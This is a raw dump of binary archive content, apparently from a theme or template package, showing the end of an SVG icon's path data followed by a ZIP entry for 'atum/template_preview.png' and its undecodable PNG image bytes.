l-21.3,21.9c-13.2,13.2-36,13.6-48.9,0.8c-12.8-12.8-12.4-35.7,0.8-48.9l21.9-21.4c1.6-1.8,1.8-3.8,1.8-5.5c0-1.6-0.1-3.1-1.8-5 L54.3,76.2c-13.2-13.2-13.6-36-0.8-48.9c12.9-12.8,35.7-12.4,48.9,0.8l21.4,21.9c1.8,1.6,3.8,1.8,5.5,1.8c1.6,0,3.1-0.1,5-1.8 l21.3-21.9c13.2-13.2,36-13.6,48.9-0.8c12.8,12.9,12.4,35.7-0.8,48.9l-21.9,21.4c-1.6,1.8-1.8,3.8-1.8,5.5c0,1.6,0.1,3.1,1.8,5 l21.9,21.3C216.8,142.6,217.2,165.5,204.4,178.3z M204.3,128.7l-21.9-21.3c-1.4-1.6-1.5-2.9-1.5-4.3c0-1.6,0.1-3.3,1.5-4.8 l21.9-21.3c1.2-1.2,2.3-2.5,3.3-3.9c-5.3,8.7-8.3,18.9-8.3,29.8c0,10.8,3,21,8.3,29.6C206.6,131.2,205.5,129.9,204.3,128.7z"/></g><g opacity="0.34"><path fill="#fff" d="M197.7,84.9l-36.5-0.2c-4-0.3-7-1.6-9.7-4.1c-2.7-2.9-4.2-6.2-4.5-10l-0.2-36.2v-0.3c0-9.5-8.2-17.5-17.9-17.6 c-9.7,0.1-17.9,8.1-17.9,17.6l-0.2,36.5c-0.3,4-1.6,7-4.1,9.7c-2.9,2.7-6.2,4.2-10,4.5l-36.2,0.2h-0.3c-9.5,0-17.5,8.2-17.6,17.9 c0.1,9.7,8.1,17.9,17.6,17.9l36.5,0.2c4,0.3,7,1.6,9.7,4.1c2.7,2.9,4.2,6.2,4.5,10l0.2,36.2v0.3c0,9.5,8.2,17.5,17.9,17.6 c9.7-0.1,17.9-8.1,17.9-17.6l0.2-36.5c0.3-3.9,1.8-7.1,4.5-10c2.7-2.5,5.7-3.8,9.7-4.1l36.2-0.2h0.3c9.5,0,17.5-8.2,17.6-17.9 C215.1,93.1,207.1,84.9,197.7,84.9z M197.7,119.8l-36.5,0.2c-4.2,0.4-7.4,1.7-10.3,4.4l0,0c-2.8,3-4.4,6.6-4.7,10.7l-0.2,36.2v0.3 c0,8.9-7.8,16.5-16.9,16.6c-9.2-0.1-16.9-7.7-16.9-16.6l-0.2-36.5c-0.3-4-1.9-7.6-4.8-10.7c-2.9-2.7-6.1-4.1-10.3-4.4l-36.2-0.2 h-0.3c-8.9,0-16.5-7.8-16.6-16.9c0.1-9.2,7.7-16.9,16.6-16.9l36.5-0.2c4-0.3,7.6-1.9,10.7-4.8c2.7-2.9,4.1-6.1,4.4-10.3l0.2-36.2 v-0.3c0-8.9,7.8-16.5,16.9-16.6c9.2,0.1,16.9,7.7,16.9,16.6l0.2,36.5c0.3,4,1.9,7.6,4.8,10.7c2.9,2.7,6.1,4.1,10.3,4.4l36.2,0.2 h0.3c8.9,0,16.5,7.8,16.6,16.9C214.2,112,206.6,119.8,197.7,119.8z"/><path fill="#fff" d="M232.7,102.9c0-13.8,11.2-25.1,25.1-25.1v-1c-13.9,0-25.2,10.9-26,24.5c-0.9-17.2-16.6-31.9-34.5-31.9 l-29.1,0.4c-2-0.1-3-0.9-3.9-1.9c-1.1-1.1-2.1-2.3-2.2-4.2l0.4-29.2c0-18.3-15.6-34.4-33.4-34.5c-17.8,0.1-33.4,16.2-33.4,34.5 l0.4,29.1c-0.1,2-0.9,3-1.9,3.9c-1.1,1.1-2.3,2.1-4.2,2.2l-29.2-0.4c-17.8,0-33.5,14.8-34.4,31.9C25.4,87.9,14.4,77.2,0.8,76.8h0.2 V38.7h-1v38.2h0.1v1c13.8,0,25.1,11.2,25.1,25.1c0,13.8-11.3,25-25.1,25.1l0,0.9h0V167h1v-38.1c13.4-0.5,24.3-11.2,25.1-24.5 c1,17.1,16.7,31.8,34.5,31.8l29.1-0.4c2,0.1,3,0.9,3.9,1.9c1.1,1.1,2.1,2.3,2.2,4.2l-0.4,29.2c0,18.3,15.6,34.4,33.4,34.5 c17.8-0.1,33.4-16.2,33.4-34.5L162,142c0.1-1.9,1.1-3.2,2.2-4.3l0,0c0.9-1,1.9-1.8,3.9-1.9l29.2,0.4c17.8,0,33.5-14.7,34.4-31.9 c0.8,13.6,12.2,24.5,26.1,24.6l0-1C243.9,127.9,232.7,116.7,232.7,102.9z M197.3,135.3l-29.2-0.4c-2.4,0.1-3.5,1.1-4.6,2.2 c-1.2,1.1-2.4,2.6-2.5,5l0.4,29.2c0,17.8-15.2,33.4-32.4,33.5c-17.3-0.1-32.4-15.7-32.4-33.5l0.4-29.2c-0.1-2.3-1.3-3.8-2.5-4.9 c-1.1-1.1-2.2-2.1-4.6-2.2l-29.2,0.4c-17.8,0-33.4-15.2-33.5-32.4c0.1-17.3,15.7-32.4,33.5-32.4l29.2,0.4c2.3-0.1,3.8-1.3,4.9-2.5 c1.1-1.1,2.1-2.2,2.2-4.6l-0.4-29.2c0-17.8,15.2-33.4,32.4-33.5c17.3,0.1,32.4,15.7,32.4,33.5L161,63.7c0.1,2.3,1.3,3.8,2.5,4.9 c1.1,1.1,2.2,2.1,4.6,2.2l29.2-0.4c17.8,0,33.4,15.2,33.5,32.4C230.7,120.1,215.1,135.3,197.3,135.3z"/></g></svg>PK!#3B����atum/template_preview.pngnu&1i��PNG


IHDR�E|\��iCCPsRGB IEC61966-2.1(�u��KA���'&�����!�*JT�XD|�Z$'�I�\"�q�EDl[AA��U�_��`-�"��`�h��K���Yf�������V�Zƪ@&�7�c!e6:��=SC-���i�1U�hw��x��Ԫ|�_�,&,
\��C�a�Dž'W���­Z*�(|*�7�·�/���9l��ap7+�_��Z�����e����}��xٙ���v,ŒBa��	�ˠ�A��GVT���I�&��*&K$I��/�TOH�EO�H���o_-���T���'�~넺-(l��m���.������Y�|�дg�e-���`��XQ�w�:��@cZ��a�Գ�}��A]�����=��M�C�g֩���	pHYs���+ IDATx���w�g}���l��{��{�:�ԬbI�\$�M16ƴ� @	$ B-�B0l�nK��z;�N����^g~�|��T��N�y�^�og��}fv���>UZ��{��h_�,� �p����}�[7_=c��gEAAXH"AA���A\.��c��EAA8�����bL&�AAN�$�Vk���y{E���	E>��UUUM{,@A�˄&̈́%#�ъJ�i�s4�"+$caB�Q"�L�M3c�ț<��!�7�B*� pt
!��'M�Rk0g�fq��hA��>���7Jt…��|L깸~�d���M�}�s�3ٰ產5Z&�E&�t�r��ɲ���C����ez��i��դ��^�E,��zN�V�~�"*��x|�v�=�|H� ¹ ���rJ�喑JDI%���:4z#��KV!a�8�����*�KV��rR�رc:�F(]��wvL��9e�{�'��I�gI=��"��(2*��ވJ}!�8�d���k!��Hq>�_�#[�s:��$IX2I/�FN%Iţ$��;��4K:k&��#S�d6�d���!���i***��+U�O����h�����^�+��bQ%+Ub5�H&S�����a	� �)��
KF>��f".R�c7P��-gq�L2�3��1ܺ���$�p�`L����r��N�$�?�����*od���`u�U�H�3���d<�"O�Z�gQ
z�}�r>I”��F�g�}�xt������
dU,��}��gx�s��"���	��M;�:�gq:����pF$	sF�Z�x�A9uF/W��^��o=H&S�[V��jF�RQW^���Z6�[N�^G�Ê��g^eh�=mGizw�tM���r\o���+qy�'f��-�ɠ�$�ل�h���|̷��3�s]�׬� ]OI�Rr҂z���4:2l&��Z��AE,qf}ޢ�����lL#�!�sW)�,��K�@��i7�&�L2��X4���R�
�=���*�;�L�I(r�x8@"Ę��$]xC��z4�4"���miV�U�{�	���Z�8�T��kA.��;�J��� ����RkȮZN�7���9��
�E&��pc�g���2�3hti�4-�����,����10<<o���R�3Z���Fo�YRO����ۂF������,�d��G�;�ё=��~�iӌĂ�Yk�6�^F��J*u���p8�O3<��'�}�����7Lui-�|�'�ax���;���cf4jV-���c�����n�5�j�8/�V�Nw�?���f��[���7��/|��_�nqִ4��j��S�����w_W�߯���O�q
��|#���I�.��&�Z9ٙTm�񷟺����(6�;~� ,(�=����YV�]�|��~�*�ӳ(J�"���Y��Ջ���/��
���W�e���gqC��߶�<n�f-V��r�����'I*�9�Ăd��𞛯�=7_�-��q��uS�KL2���n=�Lv���HI��/hQa
E�8s�XY�OQQ6&���Adf�
��ظ��t���x9]U�s�קY�u��a�*����t�~����O��K&����X�n-k�#�{��Y-F�����e�3��eg��4(�&j2,o{VMmQ��#�QKyq�c�єF�1����f=�������
�3��3�$��j�n�7?����������}S�1
lXQ���|�*p،8l�iX�t��m++/$M�"#ǁ�4?�]kV!*��5��y�������ɴg��~���3>߳���Ր�M6���VY˗����G_���%~��o��6�T"���m�?�=�F�MOmi�\o�^�FEN:�Z���9ӝ�$��d���fԙ�y��|��領 ���y�MW.���-��:��1Mϕ��(��j60�򱿥��m=�岢���l'�T�ξav<��7o$�H�����OmY!V�������̬Z�ڥ�4֔c6����Ѩմ�p��@�?�9���������Ύ*0��`��|1Y��&b�)�:��)��&?7��E^I9��\
� �=����G����	��������h��7�������:����&~�L?���S��^ꮹ�t�������^�U++��JV�/����]�K[_&;�����D����o�r�
�j%^{�u�i\���x��㻻���ٶcG>e�4
3�%��7� �B,�������b�43����Hw�C?�a]�Zk�d�F:{��+��lS�ahR�z��W�Ԏ������O�F�Y���m�!r�sa<�u�����{b�kpu�Se�zp'���M?*��.��� �w�����d��38Ac��Մ��ira�:(��d�<¡d�m^z�chԐQ����~�0WV���_SK"���R�i�g$H*Tӳ��H���뮬cb���Σ}t��F��c��%���]�1�+3�V'�z����d��Z�C��M�p�Y��Z@������ ��|�#���Ð�Ĝ���z�?�N�8~|��&�(��u���D%5&I�������yf4��,Ng�_A-EPIzb�$W5��P[^�k���E�i�q.�@��؂Q�z���I���u(�Ž�ַ��azK���t9E���Qg`�ҟ4�$[˞�˪��™���=BzV.���}��4��
��,��i�*����B��ӑ�D<Jg�5��,���n���-��]#�
Y��u�s8)�H�gv�Ve������ݼ뚕��d�k6�b��V��F�u�������zY����C�W�Ē�K�U�G},+1r��Gcy/�ф�X㞤R�7ډL�M�~9E�%��|��L��7�Į-�s`�>y��_ZB�Y����>NCC.r2N��`(�ؑ�?���ۇbtPU`b�.z���I��ޜN�;
��l'�GYq��|����_��/�����?®���H9G��SP�Gf|�E�U(z;5���(�*�	�����I񗛗��g�����T���s��!�IOG+=^=�Z^�=�ؼq��3��e�*~�����ę�Q_:<�a۾�X\͡������k{�[M�R2��9|��x�J���?�"��Gxr�nذ�M��w���݇��o��=C[����m�l�b۾~x����m?�a=�������q�;zټn9׭]Jcm9<�2�qߟ���[�h��V�y�{�Rqí�ʼnGQ9Kk�Y�r��%ܼ�xZj�����E�W���$n��N���a�gbCYK�K��V�m���o��M��/>�Ջ�ɭl�-��?9�W��/�U���+��y�X������E������h�;V,<�«��|��J���`�z-*��Jb���)+)���Α��{����q��V�pa�Ec��!r9%�78�ʍ��<_Ma~6j�_0�Ą�Ԓ���1����j��#m-\w��\W_@�$�7�gq}%���TX�x
���㆕ttu��d��*����
�YߘK$6w�IR�$!�3�Ӳ�G_�ֳ�y�
�'�Si��5e���%PQ]蠮�A4�56FTmǬא��NC����07_WǑ�Q���e�(��fe]>W����h�A��0:�ұ�,�|��!��,V�
�^��f�j�M;���T
�D��D^�yj����d��i�EAFRif�$�=��0��xU8�:�6>o�����$�A�`gY)RR�03���QT�J�r�*���̢� �t����	V6V��zH�YYf�g0�Ӗ6�7,ɦ(׊�H��8H�
�J�T��zi5%E��Q�/�$'�@A���:�f��o*�E�Qd��|L�8{��36��#=�V��D��Gw��V��8]�QI=7l\BYY��6\�$�h��V��4��HBa�E؃A�,o���#ǮF��(��#�4����2���:��83,����͎Ӕ"+'{FM�J����0�3��7�D���/�m�=��5�`Kgq����L�i)
mj�zSܹ����l=7]����&�>�S�>�X��N��$��}'_��ɴ�av�c4*(r
eZ���I���<�j��f�P�k�����++I*IV{����pXfyu.���۱�)4up���{�p�c��T�|D��$?��W5�K�Y����~�|��yeg��w_�v�I�D$�$?�����T
�D��Q�Jvy��L���t�!+
z���1���g"���;$%˸�
zʋri�d""��	��<�E0!�H���\xR���ɟ��9̴�O۠�ܼl^y�>~�|۴Ԯ�}v/o�G�~Ǟ��D4�kl�@4��=NPVPi�=>Ʈ�o��}�L�W�&&YZb���I'�ܲ��/7�k3V��ۃ��E�R�cﭜУ�ګo$��5A-��x�!R�d*Q�'\��38-:;s����z�a���z��
�d�.#ä������6+��û���FC�z�?����(�A/�p�@d��~���&~�+�6�na�%
��N��w�<IZ��
Ik0�O��sMc}�.F�!*W�m�����Rဟ-�><mG�j�I%���\�UXT!�����!z�&�E������Q\nrr��'Rx}F�<�	R@��A�YLj7�M�a��J186�;nbM��L��h<F2)�p�i}��(:����r,:ã�"i��dg�M3s�U�	����_4��֮a�+5E&t
�H�A�0�;r<J�ˏ7��	aK�0
�T�����'���L��"XMz�vb-�'K���{8D$��v^��5!T�cO����4������	&�ny}}=�)�1Zb�:�8r6��Rk&�B���U��?�b��,i�������10�gx�P4�P�Qz}a��B	�!7c��@�d2A2)���OJI�̎vv�?BL�&������t��P8��$&j(�ئ��%�Jm&��Ù:��߷����?{���7X���C�����~�G'�� 	���_�Gӑ���x����j&BӿH���t�Xm��8�k;ݽ���~�O~�k{�(퇚�$Tj�T0��5LEu
���8�B���:����H$�߂'	[i>��ؠ�w�^O��ٌ��ʋ�p?��'��>��^����gN����N;�ۮY��� _��_p���ذb;塧_��_�MG���O~K,���8���"�8U%X�F��m�]����;q{�4T�r�:~��|����=�1��������y�r���_���|�c���w�e9�y�*,F#/l��o�s�諒g���L޷�J��=�*E��������g�~�_|�����<�o]s3�������Si��%|dc%����P_(sd�Ħ+Qb~{�en������z��<���Xw��xe�6]O�g�3���PPX�7^E(aϞ�t�Fy��עը�i�G����b��Q�H�%�8�4�<]���$AW7Ook�7bV+�����\��9�ٽ\]��}�Ƶ7l�‘F�?=��K!v.;*��t��/��`&Mg"4�t�$�Qڀ�h�?ԊM?��M>L�5�Y0�T܈��>o��`4�a���	���~���Gw�JL���Y����n��|�*����U|n/���Aij����+����d$�f`h��I*zi�35g���IVE##�{�k�Ԕ�L��OI���Ԇ���;�7v6�2�ѓ���3M"a���A-'\�#�����~�
�jB���׮5��м~���b�u7р�l^ͮZ�h�^�~/k���ݺ�VEG�>��İ�W��_1/y8S#�x����W?��ԕ̘fZXWQ��"*�
EQGc�9�NeI���c����x��7��HgQe1����>^�s�H,N��ƕK'Gw
���Qb��l��J�ʋH&S������q�,�e_s�x�V���yco30٧� '�FCG��$�vi-�9����8҉�f���n�P[Ϲ9���\`��Bf�	��
z���q��h4��i���֮�?և�{�D�*�kN)�y��D�(
��6&���6i�L��\A�;�g�
%5wtt��Y
��m�3m[v�
�
cI��6��$a�e�Y���X=E�q�4�ڶ�od��X���Ri�dW-GR�k�?s��y�+�#��H�T2�ȑ]�#�Y�?���0��}�Kh�*������oh��,'9��|���(/�o��<���sT���@A��bL�&�t�p���n�����,l���Y�dɊ��h/����^I��l2J��'��&�Lk&�T����R<`�}ߌ�D�7�]�I��?�G�3L*Gg0c�*��ȹ�?�x?��#3�;��o,�g�mߌ�Yg��S�9��?�G�=yN�if��E�����sN�}G�̜���
J�P��t�
��I��FaN��zH$�l�Aav"�|H�f��_��`D��^���J1��#=s�y�7��(�Fk0]��4_Y&��
xp��6A��TZ΢��)t4���:r*I2%0>�d�Y<��;uN�<�G�����h�YR��h[��($�&��	���4�\�i`z�޾iʸgB,'�p��]���ht�c�,/�`I�S$��9o�o�����A�3\��4_E&����GN������jB�3���.�I�O��>�����x8�h�^ti��_r
ȩр�xx�d�����ZGA���J��O�b%����1�EQH��s�q���_9� �L5C_�.̟� � �9#@AA�ˌAA.3I�<u*�Y�D�[��� � �'�#}���s��݄��r%�$���c�ڕ�b*AAνd,Lg{ی�	x���F��}
]AA�sE�LV�c��Kr�"AA.,��hJӐaӣVM#��0��N_�O�Q��'��
n�dj�Z,�Z�ͬ��#�0٢ըE�Q��0�i�hTxЂ��PJVPI��$P����`AA΅�Ӫ�?XGM�
�J����Lj'd��f��u��Z޷��U��9�s���s�YA����V���?4-�|�B�W;������(
|���y>��,+(*i�P�AAA8�f��-�fm]�$1��W?ڍ/�3�U�yEn�J;��ԎAV�8����?>�P��k�|��
�t*��eI��Vő�9�i|�}5TXxa��y��IK���2;W.��@��{o�bm���� ��	�-�G�zqۏ�(�4�O�n:��ꜘl~k
��?
� �p����eO�jz��N6�6u�H����QU��Gܼ~���8��ˇӢ��g�'�`6hX^�N4�bU��)h�'b|tScadE���lbq��b��}��|�q^�B + k�Ux+AA8wf�:��c�ͳ��vnY���2;wl(���7cɔ�D�����fj��<�}��l�V\�8E�&��gO��
���K�p����%h��&xb� �`�W��h��f��!W�p,Ɉ7B0����:�^�E���$D�'� �y!����Ӣ�FŚ:'�e�VK�d�xBfw��m��$��h�v��?��X
�Z-��O/C���ׇ���w����C��"�"Ilf-�P�p,�ըE�@�V�$1��Db)�-Z"�Z��v�Z�F-��Hē�%>�+HөѩU�T'�x����s���D� ���)ޚ0?3UTT���끯�$M�A��P�&���p��'���KӉ��)�E� �:	�ط�L����Y��ί��!��JL�(��D2E4����� \��H<IJ>��{"�H�Tz����r�QID��Y�� \�dE!M�UӰ��x8U/����K��cSEM/D� ��Ф��\�<\�V��쑼�F.ooM�m�\���[��3&j/�����\�}�\��Ա�cϦ%@�8���9�=�q�G��q͜�Q��,��.~��'��OQ�O/NU.L�G*����|�d� \ dYal��TMq� IDAT_��EBI�$?�����)�{�B����W���WL֊�"y��#��Ͽ�8r`�ʲ��:]�j�8��$�T��~�'�t�����ww�z�*>��+gO��e���ʅl��<�.�wױ�t9L�;ƆUK1��-@.�H��G�:i���FK7m���^Y33�T�7[��3緿�(��}�vF]^�*���}����}Z��D��¨�Kan&�C�����r�)�� ���?L*5�uZ���,:z�0���h�o�{`��r���k�H�*��|��/��[�~B��4�}��5���#M��q.��U���{)���jО��d"NO_*~��O���@�)@=K�پ�s��_����Pq���3Tׯ$-��{�}�

�lA�2'�t3D%#р�&��-�Ҭ��3�/�o�Eaq	~��P��H4����4�X�\�S,���6"�~�7�/?�G��,�|t��5�je���B�(9NJs��g	���l�r)�?��/�����(/��ZY�P�J�b�"�Lq���5������=�����[����ϼJ���𘇁Q������m����A���;�������,�� Op���5Kk��l0�[�妫V�����g��N�ڌ�*l{𫳨�5��������/��Ҳ2�i�+�8Ϲa>����\P��#lks���gl�n��_�.��.K˞�Q�]��_��#Eej���P� ��3	ǒ(�(?����p�J^k$��:�kkyp���F��6�g�������׌puc-��sn_���儣1�t���n��w�1��e�U����dH�>���?’�2�h���J��,&�~uKk�1
��~�����ظj	�4=Kj�x��m�^RC2%c6X���D2�J%�w�gݲ:�f#o�?Beq.��z
#�y&��04�AQ.�N/*"Q��6q<<O��Q#���nz�|�?m=�
��N�.IkS;m�I�*8�
dA�	�VGIQ�� ���/(--euu���gNa��[���b���_�惘��E�{4@��kY<��3��Y[����������G�����9h�*:<���2Ջנ�詩*C:%?#�?���
�p�^������]�|�_�������s�~3�ξ!��p���Dbqiz*���-�Pd��n�Ƕ��}8�$G�������B�V�?<F2�B�J(��dp�Ţ�tZ
*I"�L��
G9x��e���[k�.�87�^K"������t~���@��_x�}ly�i��|>�y-���Xmq���ً�������TO�`��}�l?<��뗋�O�3I��c�wLxx��7�~ӻȳ�OW�����6q�w��{n�
��VI_=�7l�'6wf��QkHwdqӦ:��r2���[?�av�`ź���X왬_ZA�͉.�4/y�8���?u��^�z��;�{-F���CK��}��]�v���_�y�r�^��{��{�vLK���N^��ξa�+Ku��(�e�VU3`3����5�����j�0���b����e��Z��p[/
U%�
�a6s�a���� �L��ѩ&�!�h�&%˸}:���H�QV����g_K�9;q���汵�U��f�Z�o��Q�$��i��A���=��N��S��bx� \B�&B�U*$ޚ�$傒���T-nĠ;y��~�6��/)ȴ����0�"��h�J:�j s�<kX[^DEQ.;�Z��rR����	ED��|;�P�K��� \��#�uȑ�>�t�0��ȅ_�&� � ��R(� �p�� � �eF8u*AAᒡI�fN�"\<R��|/���Xo��JB���iVVd�T�+\��3�=S%�F��1����9��_��{��@���F�˽\x'4'�;�8�gN%1k�(
��a��y$�s4�X�"�%O9�R��H�άD�jTdZ�3�G�)d��
�I�h"uF�Q�$f݌�%%+��g��KIJV�Ēg��J�nҡל}x��g��ƷM�#+
�DJ�gH%�Q�F��k0��'.P�.F�ST�R.�ݬ��d�j1�DäR�oa~!�e�^�kr��CO��4%+�T3k�.�$`��v䭚���.�t淸��L��>�e_.����O'�c�Y*��SPfYb*���.�2����r��f
����v8�k������_�V/_̾CG��'M��j��t��1҈�㌎��G6AA�4k�L�S�����8_��Gi:�Jo��t��|��^��W>ʫ�w�����حdE!�f����'_x�t��`8�^�C�Q��hx�-���f"<�G{��z���Y�P�=��I����
���0�rS��˘�͚?x��+� �0�9���Z;���V��j���6��H[��RV\�7��������ʕ$S2���SYZ�#�Na^��t�z#c.B��]�#O�xQ��X��~���[��l�?~�kdy����	��@�6�TJ�|Aa��J�z�&#�
�ff�`0��l����U�c��ٹ��U�O$I$��!z�X�PC��A0�j6���/S\��?$�ϒ�SUy)��m;���Ca�l`��e��a��=_�AA�Ӝ`2)�M��i�����^�f�����g^z��
�ح��s�U���e�:{X���W����*�G]8vz��wyI�RX-&F�]�� �^��w�η~�s�h>iZ����%�sy(��a��9�AA8�Y�`(L*�����P8Lb��n�P������M-mS��c��߯���m�f��{�a�ϿX,�'����J�;0�?|�G��Q,�p�\fOA����OO��צ+
�
ϖT������g�.t6�y�p�P���p�Ō�h��(k�%gA����d������t�B�H�D�A��f��4�v��sI�5t{}�����K���;�BS����rV5���U����=/����>aN�ʊrr� ��%�}mz�8��+���
�
Wku8,����'����=ʛ����i��x��b��w@N�dǁ�x"
�j+h�.Ƥk-�������1�'�b���:K�$qu^����V�9��9�x��y��vR
���O�޽����^�"
UEhČ�gd˖�������EBI����R���FLJ5e�����e�k���c���Z�ڊt�x�e~�ȳ��8߲�ٻ�m�Ï�������/��9L}C#���~O��
����r^����f&#Cm-y��v�Ћ�(�*�,����[�\^:Dx	�����&�t���;��5�[3Ѥ�Iv��r�~ߣ��%>���X]�����H��)jW."�"
$�3�f�t
��LL��_��ƚ����Mf�^sv�8��¾C�s��mkQ�4��ϟ��~��-t�.*J2����D��T��{�����+�j���n�,j�����>�4	�س���Ȣ"�Nrl��`>���2����2�h?a[QNƂ��b784��[=ǖ:3�y�J��P(ȶ���K=K���D�s!�Ha���{�6�YLM�(�Th������#�d�Ĝk?O���t���>�I*5kW-��Eż��6^;:���g��<�%l�W��;��",z=~����@���l�wU6���x������P4�����_���]S�C<��~"R�����i�Z�*(�q̾.��"M%���[MhԢg�|Pd_ D\�d2qBM���W� M`J��OGw[?���j��T"����:�F�y��Ŧ~��|���[�����7�'ì���A���H\b�u,)�\�^2Dx�
�����'�qE0Yz��]��	r�-�ȴ	����
!;u<�u�P�7������"�cu���꣼���7�Ww5�֦��Be����R54��>�2C�T��o�ldFGn1_����`�SPR���O��A2�O�Hk�0��{3&�8��›�tZ��v��	��� @2��;�G�cR�˅3݆w"p�U@T*	�~�QP�e�*�,��UO|�zFKi�qc�{��f�+.-cS}��\�	&n�\�R�P��ƪ�B~���x�ɓ�-+�$�a=O9��'���H�	trx��=�S�i\�A�>���p�p�{幢���Ǹ7�)[\�o׼��w�d'��q~���SM�#��8���`U}!��p^���J��W>�O��w|��EulThW�_���+��s��7�/?��|���/��^��߾�E�{���>pҴ%E|�>LN�����������*v���V7"kMx�Zg
��z{�6�̍�d�:�b*0�\���x�:�y�q����4����X�DCŹR[���7-b���4�D���Xm85
�8o󡴺�~7���"�ض}۶O_(�j���*�ь�ud��o����/OV�$�pdZ�t��
��������s#O<�
��Z�K�ع��K!+2=C�4�2�>��҆Z�[;x���s.3w!����/�������}Msֈ
�T"��n�
rw�����6�}O��9�)�L4e�;�<K�����M�$����t�^Z�
ۜ�$Ibɲ�,/I?����x��GG��:'�!��^����!�<�^��Dei�"���1=�/|�Ʃi`����p<��`�ƫWNM#�̟`An6����������X
`�0��/g��`����w{q:���M�{��f��hp���O$�,-"�H���+�j5ly}S�\$F��ȲBuE	;�5͙.
����1��Q�{��^{�*Fe+�YN�N�Fc��_%�?�r���ܓ��$	��t�rt��h��%�ʂ�����&���?d�=bZ�ӳ����-,a{s/����$����B�h���N�����|ۏ��1�'3�����b�svi�vt���}|�G�����D��&F�QZZ;�۬���q�m�=Ԍ�秳����,\n/.���K'ku:-�w �nC�R�J]<�'U*_��'y򅗹���4��lbe�"�\
�s,��/�w�.�{_��_�<m)�i�L�=�ORk�<I�p����D�n~/.*�O�F����������%Eg���3��pn������<_�ڿs���E��.>�4�����9�ޅJ���h�ZdY�j1����S)�$~��$|�v� H<�8G:O~v����8e:��ǣ�l����L�����	�ĢQ�?�Vϲ���Ά �R��L�Q4��K3���66���>�>�'�Dc�·��&�p	G���9��5#_,dY�hG�i�����s�#a.��TS���wNQd�)�X�)�B2%�s)‚�.AJ*Ls�Q���>�BggA���K<��w����9���������s���[�0t	V�v���O~��������f�Q#����x~Ǒ�m�Ã���
�G9:횖i;���NƱw�N���3�l<�q��_�0q�����@;�:�z=���|��Ş��ii���?>�Hģ�m:B�y��0���f��n���1�x�����{���Eg�d��>^�}truqJƣ�k:���1��z�CS�̋ϼ�����8B���$��C��<�A41{'̖}���o�f�;�Lo7[yt�]=.EqϿ~�m����@o�̩g_�8��sر��E�v���,[RK���Z~|d�Q�g��_?����� ��7=M�i\��4�����O�p
�^��ȁ�,6T�0Yê��u�W-���=0N"����jTS�O��CN5W�ii���ނ����l;=G9��(�N�4v����vU�����Tj�:�;�tF����k��Bc�b��t����-�=�K@2Q[h��y��L-!�on���Owqs&�+f_�d��cq��	'�v�/������>H]����,�����4���(ɦ����(u6�zXZie`ċؽ��Ξ������C]E)��>����*���혭�#��w*�cC4�����M��|�������T��fK��(��������FW�χ�,o(c��6��YQ���Y� 5���pT�����n(d��:����a������*�#=�5��ht	�>x��EEl�C�' ����q�g��Ⱦ�Gh�zc�	�Z��s(�('#��p�QB!	�U�$K$�2�]����(ɶ����.5U%��J�ذv)&ݥQ��ޕ��"����қ9��(�t��$�>�L��wSPRr��O<�(;�C���h��67Q߸���ox�{T�f�YN���Ɋ�ȫX�*o��T�mm�d:�lZ^�֎��u���G�ـVR�H�YR_uQ�{^{�Gw��z��Ώ$3��>t�;[*��� lx��LD�k(˶ ;,t�3�c�D�>b�~��I�������x��gK�|��<�
taЙ�(>��aMS1I�=���<ʾQ�Bz�+ę��xo-��qIz=��~&L)֝�pt��_>��p��h���w�5j>��R�<?K����d��4L����ne���4T����n�r1�Fٵ����
��x�J0a��XՅ���/�t�9�z��o���k#�SQQ
�(/l}��e�0��5�1�3�:����:li�F�Ʊgd�n�b���o}���(���Sq�6u�7^}�}�I��01��<�}�q��$##�fg1�ӌ;�17���$��9���k�
D�qr��XwE
�V�RH/{9d�����iMd��롥�M�-Lߨ�ZGww7����h9Ԃ��!Ӣ"�Xy4ꧾ��?l9@EQY	7Sƥ�7��+	�$�������~�JJP%�D|nE":ŹvzR$�q��J��:���n�Q��%�s6)ɵ�aI{�K����-ܲ*���F(�3Ⱊ�����nE�پ���J�ÑAAn�IC �J�H4�o]��HI��19�+,S�m�鰠9�~���Q�T�z��y�H�b�I�ۇɠ'�`g��d����Im����|�ZXT]�#�����xI)��4lV��D@"7'�<{�A����+��2؍#Wd�1Z,$ƍX��H~��,}��0q�_%���j)̱c��p��cǤV�ٻ��:�{���E��%��ׄt��d��������~�ϲ���K�%!J�㸗�W�ȲdY]�:���Cn�$�E�,�_/%�̝;g�f�|�)�c�^�9�y&"��Hk�B�7�Î�����i��ioo#e���5�gc���yH@qI�v�%�bq���{�%��51%;��?��Ut�m,Y~-=

�V�b'��/K���򸱥ü�fޜ��:9�^�?�������>��U
SQ:n��}�*�Pžc��������B�P��59Z�ĸ\?�q�
���lV��K���WV�),�«�Ѕ�y^~/A���݆SQpzs�s�P�c�D5GkH���vر��.r��t�h���A�׶1����E@McE�ʥ�E���D|���/<��n�n��eY���k��I�ٻ�\��+�;�b`\%�JK�}n�8:�N=�$^�B2��u��$�z<�c$Hf4�����W��-�~�=����D#IY�[��K�x]
�H�͂�n��2���)[�
��)a���t��DZ���FR3�{݌�6C������v�^ɓ�Z�֗�'۫����&IUG~G��T2�ծ`�t�݉"���6N�D$��u�1L	Sː6d���~,Ŵ�q+V��$Y�f�б`�*�����Yw���Ҡ
��)Y�3i슝H4���FK'�$>���a �JKc#��;��
�8..��uy(�"�H��.$���~�����X �P�{��Iق�
є��aG�|'����cW��e�9h��U2�gL�n;�H�ˉa�dh���MQ�X,��Nו�90
��o϶n�$Ձ�1����J��&�L���.7�D�Én�d��VR�Vʼns���h����hRE���/M� �#[m�d�j'�Lb�+H���| IDAT�j�xܽ��j���b�f��N&�g�^7�T���nd�dӔp��h���W�ƶ&��<|/V-��"#��8��Ȳ��n!�T{�#�L$���v��t,Xlv���})c�k�i�XJ�"K�b��h�5�G�dNOޝ4i��������s��:+�;�k�}t�X*()��}��$ق��;���;#1�Ł�T�`�u�c�>��/e�����a���⿽���Ŏ�vr��B�z4�c���C���T����0��?��od鍃���
�x�ۭ�w(��pP1u8�~���ğ�zb%����Q��'*��e�$[�O�����x���A�O[b�y�5��:��z�����v{8�
